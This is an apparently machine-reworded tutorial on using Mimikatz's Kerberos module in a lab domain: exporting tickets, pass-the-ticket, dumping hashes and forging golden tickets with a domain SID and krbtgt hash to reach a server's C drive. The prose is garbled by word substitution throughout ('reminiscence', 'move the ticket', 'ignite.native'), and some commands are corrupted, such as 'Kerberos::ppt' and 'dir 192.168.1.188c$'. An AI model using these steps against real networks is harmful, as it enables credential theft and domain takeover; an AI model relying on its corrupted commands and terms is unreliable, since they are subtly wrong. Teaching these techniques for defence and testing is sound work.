This write-up will probably be a part of a sequence of articles on the software known as Mimikatz which was created within the programming language C. it’s principally used for extracting Kerberos ticket from the reminiscence and producing golden tickets.
Desk of Content material
- Kerberos::listing
- Kerberos::listing /export
- Kerberos::ppt ticket.kirbi
- Kerberos::tgt
- Kerberos::ask
- Kerberos::hash
- Kerberos::golden
- Kerberos::ptc
- Kerberos::clist
- Kerberos::purge
On this situation, we will probably be utilizing Mimikatz contained in the consumer machine to seek out out tickets obtainable inside the consumer system.
Kerberos::listing
We’ll use the command:
kerberos::listing
This listing command will show all of the tickets obtainable on the consumer machine.
As you’ll be able to see from the above screenshot, there are 2 tickets inside our consumer machine. The listing command will present info equivalent to:
- Begin/Finish time of ticket
- Server title
- Shopper title
- and the Flag
Kerberos::listing /export
Now as soon as this info has been obtainable and if we wish to save these for future use or reference, we’ll use the next command:
kerberos::listing /export
It will save the above TGT tickets within the Mimikatz folder within the kirbi format.
Now that the ticket has been saved within the Mimikatz folder, we renamed it to ticket.kirbi for ease of use. Notice that this isn’t a compulsory course of.
Since we now have this ticket, we’ll now see how it may be used in a while for lateral motion in order that we are able to carry out move the ticket assault.
To carry out the move the ticket connect (ptt) we’ll situation the next command:
Kerberos::ppt ticket.kirbi
As soon as the command has been executed efficiently, we’ll situation one other command misc::cmd which can open a command immediate session. We will see that the command immediate session has been opened with the area consumer igniteaarti.
Let’s attempt to browse the listing of the server with the consumer aarti by typing the next command within the command immediate:
dir 192.168.1.188c$ (192.168.1.188 is the server IP deal with)
As you’ll be able to see, we’re in a position to view all of the directories of the server.
So being a non-administrator area account, the consumer aarti was in a position to test the listing of the C drive of the server through the use of a PTT assault.
Kerberos TGT
To show all TGT (Ticket Granting Ticket), we are able to use the next command:
kerberos::tgt
Kerberos ASK
It lets you entry the service ticket. The syntax for operating this command is as follows:
Kerberos::ask /goal/spn title ,the place spn title is cifs:/dc1.ignite.native
kerberos::ask /goal:cifs/dc1.ignite.native
To show all of the service tickets, we situation the command:
kerberos::listing
As we are able to see, we now have 3 tickets listed beneath.
Kerberos Hash
kerberos::hash
It will dump all hashes obtainable on the consumer machine.
Kerberos ::golden
Golden Ticket Assault (GTA)
Golden Tickets are cast Ticket-Granting Tickets (TGTs), additionally known as authentication tickets. Some primary info wanted to carry out this assault are:
- Area title: ignite.native
- SID: S-1-5-21-1255168540-3690278322-1592948969
- KRBTGT Hash: 5cced0cb593612f08cf4a0b4f0bcb017
- And an impersonate consumer: raaz
So if we now have the area title, the SID and the hash worth of krbtgt, then we are able to go for move the ticket assault by producing a pretend golden ticket assault.
So the command for performing GTA is as follows:
kerberos::golden /consumer:raaz /area:ignite.native /sid S-1-5-21-1255168540-3690278322-1592948969 /krbtgt: 5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt
The place the id:500 is for administrator privilege
As proven above, the command has been accomplished efficiently. Now let’s launch the command immediate through Mimikatz by issuing the command: misc::cmd
By way of the brand new command immediate, we can entry the server directories similar as in earlier examples.
One other methodology of golden ticket assault might be carried out through the use of the software impacket.
When utilizing Mimikatz or Rubeus, they’ll generate the ticket in .kirbi format file. But when we use impacket for golden ticket assault in order that we are able to get the ticket, it is not going to offer you ticket in kirbi format. It gives you the ticket in .ccache format.
Kerberos::ptc
So if we now have the ticket in ccache format, then we are able to carry out the move the ccache as proven beneath. Command is:
kerberos::ptc Administrator.ccache
The misc::cmd will open a brand new command immediate through which we can entry the server directories, similar as our earlier examples.
Kerberos::clist
If we wish to listing all of the ccache recordsdata that exist on the consumer system, we use the next command:
kerberos::clist Administrator.cache
Kerberos::purge
If we wish to delete all of the tickets, both ccache or kirbi format, we are able to use the next command:
kerberos::purge
Creator: Tirut Hawoldar is a Cyber Safety Fanatic and CTF participant with 15 years of expertise in IT Safety and Infrastructure. Could be Contacted on LinkedIn